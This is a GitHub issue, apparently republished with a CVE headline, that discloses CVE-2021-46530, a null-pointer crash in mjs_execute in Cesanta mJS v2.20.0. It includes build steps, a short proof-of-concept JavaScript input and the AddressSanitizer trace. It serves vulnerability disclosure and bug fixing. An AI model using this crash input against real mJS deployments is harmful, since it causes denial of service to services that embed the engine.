Headline
CVE-2021-46530: SEGV src/mjs_exec.c:823 in mjs_execute · Issue #206 · cesanta/mjs
Cesanta MJS v2.20.0 was discovered to contain a SEGV vulnerability via mjs_execute at src/mjs_exec.c. This vulnerability can lead to a Denial of Service (DoS).
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
hope-fly opened this issue
Dec 31, 2021
· 0 comments
Comments
mJS revision
Commit: b1b6eac
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
vim Makefile DOCKER_GCC=gcc $(DOCKER_GCC) $(CFLAGS) $(TOP_MJS_SOURCES) $(TOP_COMMON_SOURCES) -o $(PROG)
save the makefile then make
make
Test casepoc.js
function JSEtest() {
let arr = [1];
arr.splice((arr.splice(0, 17)= [1])= [1])= [1]
}
JSEtest();
Execution steps & Output
$ ./mjs/build/mjs poc.js ASAN:DEADLYSIGNAL ================================================================= ==23867==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55dcd2425950 bp 0x000000000000 sp 0x7fff558e7b00 T0) ==23867==The signal is caused by a READ memory access. ==23867==Hint: address points to the zero page. #0 0x55dcd242594f in mjs_execute src/mjs_exec.c:823 #1 0x55dcd2430a05 in mjs_exec_internal src/mjs_exec.c:1073 #2 0x55dcd2430a05 in mjs_exec_file src/mjs_exec.c:1096 #3 0x55dcd23ed909 in main src/mjs_main.c:47 #4 0x7f63f4c54b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x55dcd23ee449 in _start (/usr/local/bin/mjs+0xe449)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV src/mjs_exec.c:823 in mjs_execute
Credits: Found by OWL337 team.
1 participant
